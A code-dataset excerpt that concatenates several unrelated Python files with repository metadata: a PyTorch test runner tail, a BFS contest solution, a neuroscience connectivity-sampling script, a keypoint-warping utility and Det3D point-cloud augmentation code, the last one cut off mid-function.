print(slow_tests)
with open(options.determine_from, 'r') as fh:
touched_files = [
os.path.normpath(name.strip()) for name in fh.read().split('\n')
if len(name.strip()) > 0
]
# HACK: Ensure the 'test' paths can be traversed by Modulefinder
sys.path.append('test')
selected_tests = [
test for test in selected_tests
if determine_target(TARGET_DET_LIST + slow_tests, test, touched_files, options)
]
sys.path.remove('test')
has_failed = False
failure_messages = []
try:
for test in selected_tests:
options_clone = copy.deepcopy(options)
if test in USE_PYTEST_LIST:
options_clone.pytest = True
err_message = run_test_module(test, test_directory, options_clone)
if err_message is None:
continue
has_failed = True
failure_messages.append(err_message)
if not options_clone.continue_through_error:
raise RuntimeError(err_message)
print_to_stderr(err_message)
finally:
if options.coverage:
from coverage import Coverage
test_dir = os.path.dirname(os.path.abspath(__file__))
with set_cwd(test_dir):
cov = Coverage()
if PYTORCH_COLLECT_COVERAGE:
cov.load()
cov.combine(strict=False)
cov.save()
if not PYTORCH_COLLECT_COVERAGE:
cov.html_report()
if options.continue_through_error and has_failed:
for err in failure_messages:
print_to_stderr(err)
sys.exit(1)
if __name__ == '__main__':
main()
| 37.835145 | 121 | 0.66361 |
411aaecfd27f1ddf416a56cfc0cb25271ff91d8f | 758 | py | Python | src/data/287.py | NULLCT/LOMC | 79a16474a8f21310e0fb47e536d527dd5dc6d655 | [
"MIT"
] | null | null | null | src/data/287.py | NULLCT/LOMC | 79a16474a8f21310e0fb47e536d527dd5dc6d655 | [
"MIT"
] | null | null | null | src/data/287.py | NULLCT/LOMC | 79a16474a8f21310e0fb47e536d527dd5dc6d655 | [
"MIT"
] | null | null | null | # -*- coding: UTF-8 -*-
import sys
input = sys.stdin.readline
N, Q = map(int, input().split())
adj = [[] for n in range(N + 1)]
for i in range(N - 1):
a, b = map(int, input().split())
adj[a].append(b)
adj[b].append(a)
def BFS(vnum, sv, adj):
from collections import deque
dist = [-1] * (vnum + 1)
dist[sv] = 0
que = deque([sv])
while que:
v = que.popleft()
for x in adj[v]:
if not dist[x] == -1:
continue
dist[x] = dist[v] + 1
que.append(x)
return dist[1:]
first_bfs = BFS(N, 1, adj)
for q in range(Q):
c, d = map(int, input().split())
if abs(first_bfs[c - 1] - first_bfs[d - 1]) % 2:
print('Road')
else:
print('Town')
| 20.486486 | 52 | 0.490765 |
5e483c9c038493a8c3270f624a5f86ff7d79b795 | 7,456 | py | Python | analysis/mf_grc_analysis/1share/2share_by_dist_gen_210117.py | htem/cb2_project_analysis | a677cbadc7e3bf0074975a94ed1d06b4801899c0 | [
"MIT"
] | null | null | null | analysis/mf_grc_analysis/1share/2share_by_dist_gen_210117.py | htem/cb2_project_analysis | a677cbadc7e3bf0074975a94ed1d06b4801899c0 | [
"MIT"
] | null | null | null | analysis/mf_grc_analysis/1share/2share_by_dist_gen_210117.py | htem/cb2_project_analysis | a677cbadc7e3bf0074975a94ed1d06b4801899c0 | [
"MIT"
] | null | null | null |
import os
import sys
import importlib
from collections import defaultdict
sys.path.insert(0, '/n/groups/htem/Segmentation/shared-nondev/cb2_segmentation/analysis_mf_grc')
from tools_pattern import get_eucledean_dist
'''Load data'''
import compress_pickle
fname = '/n/groups/htem/Segmentation/shared-nondev/cb2_segmentation/analysis_mf_grc/mf_grc_model/input_graph_201114.gz'
input_graph = compress_pickle.load(fname)
script_n = '2share_by_dist_210117'
n_samples = 200
import compress_pickle
input_graph = compress_pickle.load('/n/groups/htem/Segmentation/shared-nondev/cb2_segmentation/analysis_mf_grc/mf_grc_model/input_graph_201114_restricted_z.gz')
# input_graph = compress_pickle.load('/n/groups/htem/Segmentation/shared-nondev/cb2_segmentation/analysis_mf_grc/mf_grc_model/input_graph_201114.gz')
grcs = [k for k in input_graph.grcs.keys()]
# z_min = 15
# z_max = 35
z_min = 20000
z_max = 30000
x_min = 360000
x_max = 520000
# for mf_id, mf in input_graph.mfs.items():
# rosette_capacities = mf.get_rosette_loc_capacity()
# for rosette_loc, claw_count in rosette_capacities.items():
# x, y, z = rosette_loc
# if x < 360000 or x > 520000:
# continue
# if z < z_min*1000 or z > z_max*1000:
# continue
# mpd.add_data_point(
# x=x/1000,
# y=y/1000,
# z=z/1000,
# claw_count=claw_count,
# )
def get_prob(in_graph):
common_pair_dist = []
n_pairs = 0
n_common_pairs = 0
processed = set()
for i in in_graph.grcs:
grc_i = in_graph.grcs[i]
rosettes_i = set([mf[1] for mf in grc_i.edges])
for j in in_graph.grcs:
if i == j:
continue
if (i, j) in processed:
continue
processed.add((i, j))
processed.add((j, i))
grc_j = in_graph.grcs[j]
common_rosettes = set([mf[1] for mf in grc_j.edges])
common_rosettes = common_rosettes & rosettes_i
n_pairs += 1
if len(common_rosettes) >= 2:
dist = get_eucledean_dist(grc_i.soma_loc, grc_j.soma_loc)
dist = dist/1000
n_common_pairs += 1
common_pair_dist.append(dist)
return common_pair_dist
print(f'Generating {script_n}_observed')
observed_data = [get_prob(input_graph)]
compress_pickle.dump((
observed_data,
), f"{script_n}_observed.gz")
print(f'Generating naive_data3')
naive_data3 = []
for i in range(n_samples):
input_graph.randomize_graph_by_grc(
mf_dist_margin=4000,
single_connection_per_pair=True,
constant_grc_degree=4,
constant_dendrite_length=15000,
# always_pick_closest_rosette=True,
# preserve_mf_degree=True,
# approximate_in_degree=True,
# local_lengths=True,
)
naive_data3.append(get_prob(input_graph))
compress_pickle.dump((
naive_data3,
), f"{script_n}_naive3_{n_samples}.gz")
asdf
# naive
print(f'Generating naive_data2')
naive_data2 = []
for i in range(n_samples):
input_graph.randomize_graph_by_grc(
# mf_dist_margin=mf_dist_margin,
single_connection_per_pair=True,
constant_grc_degree=4,
constant_dendrite_length=15000,
# always_pick_closest_rosette=True,
# preserve_mf_degree=True,
# approximate_in_degree=True,
# local_lengths=True,
)
naive_data2.append(get_prob(input_graph))
compress_pickle.dump((
naive_data2,
), f"{script_n}_naive2_{n_samples}.gz")
# local_random ex30
print(f'Generating ex30')
ex30 = []
for i in range(n_samples):
input_graph.randomize_graph_by_grc(
single_connection_per_pair=True,
constant_grc_degree=4,
dendrite_range=(0, 30000),
)
ex30.append(get_prob(input_graph))
compress_pickle.dump((
ex30,
), f"{script_n}_localex30_{n_samples}.gz")
# local_random ex50
print(f'Generating ex50')
ex50 = []
for i in range(n_samples):
input_graph.randomize_graph_by_grc(
single_connection_per_pair=True,
constant_grc_degree=4,
dendrite_range=(0, 50000),
)
ex50.append(get_prob(input_graph))
compress_pickle.dump((
ex50,
), f"{script_n}_localex50_{n_samples}.gz")
# naive
print(f'Generating naive_data')
naive_data = []
for i in range(n_samples):
input_graph.randomize_graph_by_grc(
# mf_dist_margin=mf_dist_margin,
single_connection_per_pair=True,
constant_grc_degree=4,
constant_dendrite_length=15000,
always_pick_closest_rosette=True,
# preserve_mf_degree=True,
# approximate_in_degree=True,
# local_lengths=True,
)
naive_data.append(get_prob(input_graph))
compress_pickle.dump((
naive_data,
), f"{script_n}_naive_{n_samples}.gz")
# correct
# - gt dendrite length
# - gt grc degree
# - gt mf degree
print(f'Generating random_correct_data')
random_correct_data = []
for i in range(n_samples):
input_graph.randomize_graph_by_grc(
mf_dist_margin=4000,
single_connection_per_pair=True,
# constant_grc_degree=4,
# constant_dendrite_length=15000,
# always_pick_closest_rosette=True,
preserve_mf_degree=True,
# approximate_in_degree=True,
# local_lengths=True,
)
random_correct_data.append(get_prob(input_graph))
compress_pickle.dump((
random_correct_data,
), f"{script_n}_random_correct_{n_samples}.gz")
print(f'Generating random_fixed_length_data')
random_fixed_length_data = []
for i in range(n_samples):
input_graph.randomize_graph_by_grc(
mf_dist_margin=1000,
single_connection_per_pair=True,
# constant_grc_degree=4,
constant_dendrite_length=15000,
# always_pick_closest_rosette=True,
preserve_mf_degree=True,
# approximate_in_degree=True,
# local_lengths=True,
)
random_fixed_length_data.append(get_prob(input_graph))
compress_pickle.dump((
random_fixed_length_data,
), f"{script_n}_random_fixed_length_{n_samples}.gz")
print(f'Generating random_constant_grc_degree_data')
random_constant_grc_degree_data = []
for i in range(n_samples):
input_graph.randomize_graph_by_grc(
mf_dist_margin=4000,
single_connection_per_pair=True,
constant_grc_degree=4,
# constant_dendrite_length=15000,
# always_pick_closest_rosette=True,
preserve_mf_degree=True,
# approximate_in_degree=True,
# local_lengths=True,
)
random_constant_grc_degree_data.append(get_prob(input_graph))
compress_pickle.dump((
random_constant_grc_degree_data,
), f"{script_n}_random_constant_grc_degree_{n_samples}.gz")
print(f'Generating random_no_gt_mf_degree_data')
random_no_gt_mf_degree_data = []
for i in range(n_samples):
input_graph.randomize_graph_by_grc(
mf_dist_margin=4000,
single_connection_per_pair=True,
# constant_grc_degree=4,
# constant_dendrite_length=15000,
# always_pick_closest_rosette=True,
# preserve_mf_degree=True,
# approximate_in_degree=True,
# local_lengths=True,
)
random_no_gt_mf_degree_data.append(get_prob(input_graph))
compress_pickle.dump((
random_no_gt_mf_degree_data,
), f"{script_n}_random_no_gt_mf_degree_{n_samples}.gz")
| 27.925094 | 160 | 0.683208 |
54cba42ab4a78eaa2a343723f3388fb74de689ca | 1,831 | py | Python | utils/utils_keypoints.py | atapin/Caricature-Your-Face | 92fbf9156f0522bcc2592673c23a718e20b5114f | [
"MIT"
] | 27 | 2020-12-30T23:45:05.000Z | 2022-03-10T09:15:39.000Z | utils/utils_keypoints.py | TrueMatthewKirkham/Caricature-Your-Face | 205610481ebda3405a74fba801b7dd55afaff89a | [
"MIT"
] | 3 | 2021-01-01T07:09:54.000Z | 2022-02-21T21:18:10.000Z | utils/utils_keypoints.py | TrueMatthewKirkham/Caricature-Your-Face | 205610481ebda3405a74fba801b7dd55afaff89a | [
"MIT"
] | 4 | 2020-12-31T15:31:24.000Z | 2021-12-05T22:40:53.000Z | # Code from https://github.com/sunniesuhyoung/DST
import torch
import numpy as np
from warp import umeyama
def init_keypoint_params(input_im, content_path, content_pts, style_pts, device, border_num_pts=80):
# Align points with linear similarity transformation
T = umeyama(src=content_pts.data.cpu().numpy(), dst=style_pts.data.cpu().numpy(), estimate_scale=True)
T = torch.from_numpy(T).float()
target_pts_padded = torch.cat((style_pts, torch.ones((style_pts.size(0), 1))), 1)
target_pts = torch.matmul(torch.inverse(T), torch.transpose(target_pts_padded, 0, 1))
target_pts = torch.transpose(target_pts[:2], 0, 1)
# Add fixed points at image borders to prevent weird warping
height = input_im.size(2)
width = input_im.size(3)
w_d = width//(border_num_pts+1)
w_pts = w_d*(np.arange(border_num_pts)+1)
h_d = height//(border_num_pts+1)
h_pts = h_d*(np.arange(border_num_pts)+1)
border_pts = [[0, 0], [height-1, 0], [0, width-1], [height-1, width-1]]
for i in range(border_num_pts):
border_pts.append([h_pts[i], 0])
border_pts.append([h_pts[i], width-1])
border_pts.append([0, w_pts[i]])
border_pts.append([height-1, w_pts[i]])
border_pts = torch.from_numpy(np.asarray(border_pts)).float()
no_flow = [[0., 0.]] * len(border_pts)
no_flow = torch.from_numpy(np.asarray(no_flow)).float()
return content_pts.to(device), target_pts.to(device), border_pts.to(device), no_flow.to(device)
def gen_dst_pts_keypoints(src_pts, thetas, no_flow, border_pts):
flow_pts = thetas
dst_pts = src_pts + flow_pts
flow_pts_aug = torch.cat([flow_pts, no_flow], 0)
src_pts_aug = torch.cat([src_pts, border_pts], 0)
dst_pts_aug = torch.cat([dst_pts, border_pts], 0)
return src_pts_aug, dst_pts_aug, flow_pts_aug
| 36.62 | 106 | 0.69361 |
8680e5894c8ecb258e27f2401f29dcb2b7f174c3 | 36,468 | py | Python | det3d/core/sampler/preprocess.py | jianrenw/SOD-TGNN | 2533508f9565edee71af96202086ecc688b3dfe0 | [
"MIT"
] | 1 | 2022-03-29T12:04:32.000Z | 2022-03-29T12:04:32.000Z | det3d/core/sampler/preprocess.py | jianrenw/SOD-TGNN | 2533508f9565edee71af96202086ecc688b3dfe0 | [
"MIT"
] | 1 | 2022-02-18T08:17:52.000Z | 2022-03-30T07:40:24.000Z | det3d/core/sampler/preprocess.py | jianrenw/SOD-TGNN | 2533508f9565edee71af96202086ecc688b3dfe0 | [
"MIT"
] | null | null | null | import abc
import sys
import time
from collections import OrderedDict
from functools import reduce
import numba
import numpy as np
from det3d.core.bbox import box_np_ops
from det3d.core.bbox.geometry import (
is_line_segment_intersection_jit,
points_in_convex_polygon_3d_jit,
points_in_convex_polygon_jit,
)
import copy
class BatchSampler:
def __init__(
self, sampled_list, name=None, epoch=None, shuffle=True, drop_reminder=False
):
self._sampled_list = sampled_list
self._indices = np.arange(len(sampled_list))
if shuffle:
np.random.shuffle(self._indices)
self._idx = 0
self._example_num = len(sampled_list)
self._name = name
self._shuffle = shuffle
self._epoch = epoch
self._epoch_counter = 0
self._drop_reminder = drop_reminder
def _sample(self, num):
if self._idx + num >= self._example_num:
ret = self._indices[self._idx :].copy()
self._reset()
else:
ret = self._indices[self._idx : self._idx + num]
self._idx += num
return ret
def _reset(self):
# if self._name is not None:
# print("reset", self._name)
if self._shuffle:
np.random.shuffle(self._indices)
self._idx = 0
def sample(self, num):
indices = self._sample(num)
return [self._sampled_list[i] for i in indices]
# return np.random.choice(self._sampled_list, num)
class DataBasePreprocessing:
def __call__(self, db_infos):
return self._preprocess(db_infos)
@abc.abstractclassmethod
def _preprocess(self, db_infos):
pass
class DBFilterByDifficulty(DataBasePreprocessing):
def __init__(self, removed_difficulties, logger=None):
self._removed_difficulties = removed_difficulties
logger.info(f"{removed_difficulties}")
def _preprocess(self, db_infos):
new_db_infos = {}
for key, dinfos in db_infos.items():
new_db_infos[key] = [
info
for info in dinfos
if info["difficulty"] not in self._removed_difficulties
]
return new_db_infos
class DBFilterByMinNumPoint(DataBasePreprocessing):
def __init__(self, min_gt_point_dict, logger=None):
self._min_gt_point_dict = min_gt_point_dict
logger.info(f"{min_gt_point_dict}")
def _preprocess(self, db_infos):
for name, min_num in self._min_gt_point_dict.items():
if min_num > 0:
filtered_infos = []
for info in db_infos[name]:
if info["num_points_in_gt"] >= min_num:
filtered_infos.append(info)
db_infos[name] = filtered_infos
return db_infos
class DataBasePreprocessor:
def __init__(self, preprocessors):
self._preprocessors = preprocessors
def __call__(self, db_infos):
for prepor in self._preprocessors:
db_infos = prepor(db_infos)
return db_infos
def filter_gt_box_outside_range(gt_boxes, limit_range):
"""remove gtbox outside training range.
this function should be applied after other prep functions
Args:
gt_boxes ([type]): [description]
limit_range ([type]): [description]
"""
gt_boxes_bv = box_np_ops.center_to_corner_box2d(
gt_boxes[:, [0, 1]], gt_boxes[:, [3, 3 + 1]], gt_boxes[:, -1]
)
bounding_box = box_np_ops.minmax_to_corner_2d(
np.asarray(limit_range)[np.newaxis, ...]
)
ret = points_in_convex_polygon_jit(gt_boxes_bv.reshape(-1, 2), bounding_box)
return np.any(ret.reshape(-1, 4), axis=1)
def filter_gt_box_outside_range_by_center(gt_boxes, limit_range):
"""remove gtbox outside training range.
this function should be applied after other prep functions
Args:
gt_boxes ([type]): [description]
limit_range ([type]): [description]
"""
gt_box_centers = gt_boxes[:, :2]
bounding_box = box_np_ops.minmax_to_corner_2d(
np.asarray(limit_range)[np.newaxis, ...]
)
ret = points_in_convex_polygon_jit(gt_box_centers, bounding_box)
return ret.reshape(-1)
def filter_gt_low_points(gt_boxes, points, num_gt_points, point_num_threshold=2):
points_mask = np.ones([points.shape[0]], np.bool)
gt_boxes_mask = np.ones([gt_boxes.shape[0]], np.bool)
for i, num in enumerate(num_gt_points):
if num <= point_num_threshold:
masks = box_np_ops.points_in_rbbox(points, gt_boxes[i : i + 1])
masks = masks.reshape([-1])
points_mask &= np.logical_not(masks)
gt_boxes_mask[i] = False
return gt_boxes[gt_boxes_mask], points[points_mask]
def mask_points_in_corners(points, box_corners):
surfaces = box_np_ops.corner_to_surfaces_3d(box_corners)
mask = points_in_convex_polygon_3d_jit(points[:, :3], surfaces)
return mask
@numba.njit
def _rotation_matrix_3d_(rot_mat_T, angle, axis):
rot_sin = np.sin(angle)
rot_cos = np.cos(angle)
rot_mat_T[:] = np.eye(3)
if axis == 1:
rot_mat_T[0, 0] = rot_cos
rot_mat_T[0, 2] = -rot_sin
rot_mat_T[2, 0] = rot_sin
rot_mat_T[2, 2] = rot_cos
elif axis == 2 or axis == -1:
rot_mat_T[0, 0] = rot_cos
rot_mat_T[0, 1] = -rot_sin
rot_mat_T[1, 0] = rot_sin
rot_mat_T[1, 1] = rot_cos
elif axis == 0:
rot_mat_T[1, 1] = rot_cos
rot_mat_T[1, 2] = -rot_sin
rot_mat_T[2, 1] = rot_sin
rot_mat_T[2, 2] = rot_cos
@numba.njit
def _rotation_box2d_jit_(corners, angle, rot_mat_T):
rot_sin = np.sin(angle)
rot_cos = np.cos(angle)
rot_mat_T[0, 0] = rot_cos
rot_mat_T[0, 1] = -rot_sin
rot_mat_T[1, 0] = rot_sin
rot_mat_T[1, 1] = rot_cos
corners[:] = corners @ rot_mat_T
@numba.jit(nopython=True)
def _box_single_to_corner_jit(boxes):
num_box = boxes.shape[0]
corners_norm = np.zeros((4, 2), dtype=boxes.dtype)
corners_norm[1, 1] = 1.0
corners_norm[2] = 1.0
corners_norm[3, 0] = 1.0
corners_norm -= np.array([0.5, 0.5], dtype=boxes.dtype)
corners = boxes.reshape(num_box, 1, 5)[:, :, 2:4] * corners_norm.reshape(1, 4, 2)
rot_mat_T = np.zeros((2, 2), dtype=boxes.dtype)
box_corners = np.zeros((num_box, 4, 2), dtype=boxes.dtype)
for i in range(num_box):
rot_sin = np.sin(boxes[i, -1])
rot_cos = np.cos(boxes[i, -1])
rot_mat_T[0, 0] = rot_cos
rot_mat_T[0, 1] = -rot_sin
rot_mat_T[1, 0] = rot_sin
rot_mat_T[1, 1] = rot_cos
box_corners[i] = corners[i] @ rot_mat_T + boxes[i, :2]
return box_corners
@numba.njit
def noise_per_box(boxes, valid_mask, loc_noises, rot_noises):
# boxes: [N, 5]
# valid_mask: [N]
# loc_noises: [N, M, 3]
# rot_noises: [N, M]
num_boxes = boxes.shape[0]
num_tests = loc_noises.shape[1]
box_corners = box_np_ops.box2d_to_corner_jit(boxes)
current_corners = np.zeros((4, 2), dtype=boxes.dtype)
rot_mat_T = np.zeros((2, 2), dtype=boxes.dtype)
success_mask = -np.ones((num_boxes,), dtype=np.int64)
# print(valid_mask)
for i in range(num_boxes):
if valid_mask[i]:
for j in range(num_tests):
current_corners[:] = box_corners[i]
current_corners -= boxes[i, :2]
_rotation_box2d_jit_(current_corners, rot_noises[i, j], rot_mat_T)
current_corners += boxes[i, :2] + loc_noises[i, j, :2]
coll_mat = box_collision_test(
current_corners.reshape(1, 4, 2), box_corners
)
coll_mat[0, i] = False
# print(coll_mat)
if not coll_mat.any():
success_mask[i] = j
box_corners[i] = current_corners
break
return success_mask
@numba.njit
def noise_per_box_group(boxes, valid_mask, loc_noises, rot_noises, group_nums):
# WARNING: this function need boxes to be sorted by group id.
# boxes: [N, 5]
# valid_mask: [N]
# loc_noises: [N, M, 3]
# rot_noises: [N, M]
num_groups = group_nums.shape[0]
num_boxes = boxes.shape[0]
num_tests = loc_noises.shape[1]
box_corners = box_np_ops.box2d_to_corner_jit(boxes)
max_group_num = group_nums.max()
current_corners = np.zeros((max_group_num, 4, 2), dtype=boxes.dtype)
rot_mat_T = np.zeros((2, 2), dtype=boxes.dtype)
success_mask = -np.ones((num_boxes,), dtype=np.int64)
# print(valid_mask)
idx = 0
for num in group_nums:
if valid_mask[idx]:
for j in range(num_tests):
for i in range(num):
current_corners[i] = box_corners[i + idx]
current_corners[i] -= boxes[i + idx, :2]
_rotation_box2d_jit_(
current_corners[i], rot_noises[idx + i, j], rot_mat_T
)
current_corners[i] += (
boxes[i + idx, :2] + loc_noises[i + idx, j, :2]
)
coll_mat = box_collision_test(
current_corners[:num].reshape(num, 4, 2), box_corners
)
for i in range(num): # remove self-coll
coll_mat[i, idx : idx + num] = False
if not coll_mat.any():
for i in range(num):
success_mask[i + idx] = j
box_corners[i + idx] = current_corners[i]
break
idx += num
return success_mask
@numba.njit
def noise_per_box_group_v2_(
boxes, valid_mask, loc_noises, rot_noises, group_nums, global_rot_noises
):
# WARNING: this function need boxes to be sorted by group id.
# boxes: [N, 5]
# valid_mask: [N]
# loc_noises: [N, M, 3]
# rot_noises: [N, M]
num_boxes = boxes.shape[0]
num_tests = loc_noises.shape[1]
box_corners = box_np_ops.box2d_to_corner_jit(boxes)
max_group_num = group_nums.max()
current_box = np.zeros((1, 5), dtype=boxes.dtype)
current_corners = np.zeros((max_group_num, 4, 2), dtype=boxes.dtype)
dst_pos = np.zeros((max_group_num, 2), dtype=boxes.dtype)
current_grot = np.zeros((max_group_num,), dtype=boxes.dtype)
dst_grot = np.zeros((max_group_num,), dtype=boxes.dtype)
rot_mat_T = np.zeros((2, 2), dtype=boxes.dtype)
success_mask = -np.ones((num_boxes,), dtype=np.int64)
corners_norm = np.zeros((4, 2), dtype=boxes.dtype)
corners_norm[1, 1] = 1.0
corners_norm[2] = 1.0
corners_norm[3, 0] = 1.0
corners_norm -= np.array([0.5, 0.5], dtype=boxes.dtype)
corners_norm = corners_norm.reshape(4, 2)
# print(valid_mask)
idx = 0
for num in group_nums:
if valid_mask[idx]:
for j in range(num_tests):
for i in range(num):
current_box[0, :] = boxes[i + idx]
current_radius = np.sqrt(
current_box[0, 0] ** 2 + current_box[0, 1] ** 2
)
current_grot[i] = np.arctan2(current_box[0, 0], current_box[0, 1])
dst_grot[i] = current_grot[i] + global_rot_noises[idx + i, j]
dst_pos[i, 0] = current_radius * np.sin(dst_grot[i])
dst_pos[i, 1] = current_radius * np.cos(dst_grot[i])
current_box[0, :2] = dst_pos[i]
current_box[0, -1] += dst_grot[i] - current_grot[i]
rot_sin = np.sin(current_box[0, -1])
rot_cos = np.cos(current_box[0, -1])
rot_mat_T[0, 0] = rot_cos
rot_mat_T[0, 1] = -rot_sin
rot_mat_T[1, 0] = rot_sin
rot_mat_T[1, 1] = rot_cos
current_corners[i] = (
current_box[0, 2:4] * corners_norm @ rot_mat_T
+ current_box[0, :2]
)
current_corners[i] -= current_box[0, :2]
_rotation_box2d_jit_(
current_corners[i], rot_noises[idx + i, j], rot_mat_T
)
current_corners[i] += (
current_box[0, :2] + loc_noises[i + idx, j, :2]
)
coll_mat = box_collision_test(
current_corners[:num].reshape(num, 4, 2), box_corners
)
for i in range(num): # remove self-coll
coll_mat[i, idx : idx + num] = False
if not coll_mat.any():
for i in range(num):
success_mask[i + idx] = j
box_corners[i + idx] = current_corners[i]
loc_noises[i + idx, j, :2] += dst_pos[i] - boxes[i + idx, :2]
rot_noises[i + idx, j] += dst_grot[i] - current_grot[i]
break
idx += num
return success_mask
@numba.njit
def noise_per_box_v2_(boxes, valid_mask, loc_noises, rot_noises, global_rot_noises):
# boxes: [N, 5]
# valid_mask: [N]
# loc_noises: [N, M, 3]
# rot_noises: [N, M]
num_boxes = boxes.shape[0]
num_tests = loc_noises.shape[1]
box_corners = box_np_ops.box2d_to_corner_jit(boxes)
current_corners = np.zeros((4, 2), dtype=boxes.dtype)
current_box = np.zeros((1, 5), dtype=boxes.dtype)
rot_mat_T = np.zeros((2, 2), dtype=boxes.dtype)
dst_pos = np.zeros((2,), dtype=boxes.dtype)
success_mask = -np.ones((num_boxes,), dtype=np.int64)
corners_norm = np.zeros((4, 2), dtype=boxes.dtype)
corners_norm[1, 1] = 1.0
corners_norm[2] = 1.0
corners_norm[3, 0] = 1.0
corners_norm -= np.array([0.5, 0.5], dtype=boxes.dtype)
corners_norm = corners_norm.reshape(4, 2)
for i in range(num_boxes):
if valid_mask[i]:
for j in range(num_tests):
current_box[0, :] = boxes[i]
current_radius = np.sqrt(boxes[i, 0] ** 2 + boxes[i, 1] ** 2)
current_grot = np.arctan2(boxes[i, 0], boxes[i, 1])
dst_grot = current_grot + global_rot_noises[i, j]
dst_pos[0] = current_radius * np.sin(dst_grot)
dst_pos[1] = current_radius * np.cos(dst_grot)
current_box[0, :2] = dst_pos
current_box[0, -1] += dst_grot - current_grot
rot_sin = np.sin(current_box[0, -1])
rot_cos = np.cos(current_box[0, -1])
rot_mat_T[0, 0] = rot_cos
rot_mat_T[0, 1] = -rot_sin
rot_mat_T[1, 0] = rot_sin
rot_mat_T[1, 1] = rot_cos
current_corners[:] = (
current_box[0, 2:4] * corners_norm @ rot_mat_T + current_box[0, :2]
)
current_corners -= current_box[0, :2]
_rotation_box2d_jit_(current_corners, rot_noises[i, j], rot_mat_T)
current_corners += current_box[0, :2] + loc_noises[i, j, :2]
coll_mat = box_collision_test(
current_corners.reshape(1, 4, 2), box_corners
)
coll_mat[0, i] = False
if not coll_mat.any():
success_mask[i] = j
box_corners[i] = current_corners
loc_noises[i, j, :2] += dst_pos - boxes[i, :2]
rot_noises[i, j] += dst_grot - current_grot
break
return success_mask
@numba.njit
def points_transform_(
points, centers, point_masks, loc_transform, rot_transform, valid_mask
):
num_box = centers.shape[0]
num_points = points.shape[0]
rot_mat_T = np.zeros((num_box, 3, 3), dtype=points.dtype)
for i in range(num_box):
_rotation_matrix_3d_(rot_mat_T[i], rot_transform[i], 2)
for i in range(num_points):
for j in range(num_box):
if valid_mask[j]:
if point_masks[i, j] == 1:
points[i, :3] -= centers[j, :3]
points[i : i + 1, :3] = points[i : i + 1, :3] @ rot_mat_T[j]
points[i, :3] += centers[j, :3]
points[i, :3] += loc_transform[j]
break # only apply first box's transform
@numba.njit
def box3d_transform_(boxes, loc_transform, rot_transform, valid_mask):
num_box = boxes.shape[0]
for i in range(num_box):
if valid_mask[i]:
boxes[i, :3] += loc_transform[i]
boxes[i, 6] += rot_transform[i]
def _select_transform(transform, indices):
result = np.zeros((transform.shape[0], *transform.shape[2:]), dtype=transform.dtype)
for i in range(transform.shape[0]):
if indices[i] != -1:
result[i] = transform[i, indices[i]]
return result
@numba.njit
def group_transform_(loc_noise, rot_noise, locs, rots, group_center, valid_mask):
# loc_noise: [N, M, 3], locs: [N, 3]
# rot_noise: [N, M]
# group_center: [N, 3]
num_try = loc_noise.shape[1]
r = 0.0
x = 0.0
y = 0.0
rot_center = 0.0
for i in range(loc_noise.shape[0]):
if valid_mask[i]:
x = locs[i, 0] - group_center[i, 0]
y = locs[i, 1] - group_center[i, 1]
r = np.sqrt(x ** 2 + y ** 2)
# calculate rots related to group center
rot_center = np.arctan2(x, y)
for j in range(num_try):
loc_noise[i, j, 0] += r * (
np.sin(rot_center + rot_noise[i, j]) - np.sin(rot_center)
)
loc_noise[i, j, 1] += r * (
np.cos(rot_center + rot_noise[i, j]) - np.cos(rot_center)
)
@numba.njit
def group_transform_v2_(
loc_noise, rot_noise, locs, rots, group_center, grot_noise, valid_mask
):
# loc_noise: [N, M, 3], locs: [N, 3]
# rot_noise: [N, M]
# group_center: [N, 3]
num_try = loc_noise.shape[1]
r = 0.0
x = 0.0
y = 0.0
rot_center = 0.0
for i in range(loc_noise.shape[0]):
if valid_mask[i]:
x = locs[i, 0] - group_center[i, 0]
y = locs[i, 1] - group_center[i, 1]
r = np.sqrt(x ** 2 + y ** 2)
# calculate rots related to group center
rot_center = np.arctan2(x, y)
for j in range(num_try):
loc_noise[i, j, 0] += r * (
np.sin(rot_center + rot_noise[i, j] + grot_noise[i, j])
- np.sin(rot_center + grot_noise[i, j])
)
loc_noise[i, j, 1] += r * (
np.cos(rot_center + rot_noise[i, j] + grot_noise[i, j])
- np.cos(rot_center + grot_noise[i, j])
)
def set_group_noise_same_(loc_noise, rot_noise, group_ids):
gid_to_index_dict = {}
for i, gid in enumerate(group_ids):
if gid not in gid_to_index_dict:
gid_to_index_dict[gid] = i
for i in range(loc_noise.shape[0]):
loc_noise[i] = loc_noise[gid_to_index_dict[group_ids[i]]]
rot_noise[i] = rot_noise[gid_to_index_dict[group_ids[i]]]
def set_group_noise_same_v2_(loc_noise, rot_noise, grot_noise, group_ids):
gid_to_index_dict = {}
for i, gid in enumerate(group_ids):
if gid not in gid_to_index_dict:
gid_to_index_dict[gid] = i
for i in range(loc_noise.shape[0]):
loc_noise[i] = loc_noise[gid_to_index_dict[group_ids[i]]]
rot_noise[i] = rot_noise[gid_to_index_dict[group_ids[i]]]
grot_noise[i] = grot_noise[gid_to_index_dict[group_ids[i]]]
def get_group_center(locs, group_ids):
num_groups = 0
group_centers = np.zeros_like(locs)
group_centers_ret = np.zeros_like(locs)
group_id_dict = {}
group_id_num_dict = OrderedDict()
for i, gid in enumerate(group_ids):
if gid >= 0:
if gid in group_id_dict:
group_centers[group_id_dict[gid]] += locs[i]
group_id_num_dict[gid] += 1
else:
group_id_dict[gid] = num_groups
num_groups += 1
group_id_num_dict[gid] = 1
group_centers[group_id_dict[gid]] = locs[i]
for i, gid in enumerate(group_ids):
group_centers_ret[i] = (
group_centers[group_id_dict[gid]] / group_id_num_dict[gid]
)
return group_centers_ret, group_id_num_dict
def noise_per_object_v3_(
gt_boxes,
points=None,
valid_mask=None,
rotation_perturb=np.pi / 4,
center_noise_std=1.0,
global_random_rot_range=np.pi / 4,
num_try=5,
group_ids=None,
):
"""random rotate or remove each groundtrutn independently.
use kitti viewer to test this function points_transform_
Args:
gt_boxes: [N, 7], gt box in lidar.points_transform_
points: [M, 4], point cloud in lidar.
"""
num_boxes = gt_boxes.shape[0]
if not isinstance(rotation_perturb, (list, tuple, np.ndarray)):
rotation_perturb = [-rotation_perturb, rotation_perturb]
if not isinstance(global_random_rot_range, (list, tuple, np.ndarray)):
global_random_rot_range = [-global_random_rot_range, global_random_rot_range]
enable_grot = (
np.abs(global_random_rot_range[0] - global_random_rot_range[1]) >= 1e-3
)
if not isinstance(center_noise_std, (list, tuple, np.ndarray)):
center_noise_std = [center_noise_std, center_noise_std, center_noise_std]
if valid_mask is None:
valid_mask = np.ones((num_boxes,), dtype=np.bool_)
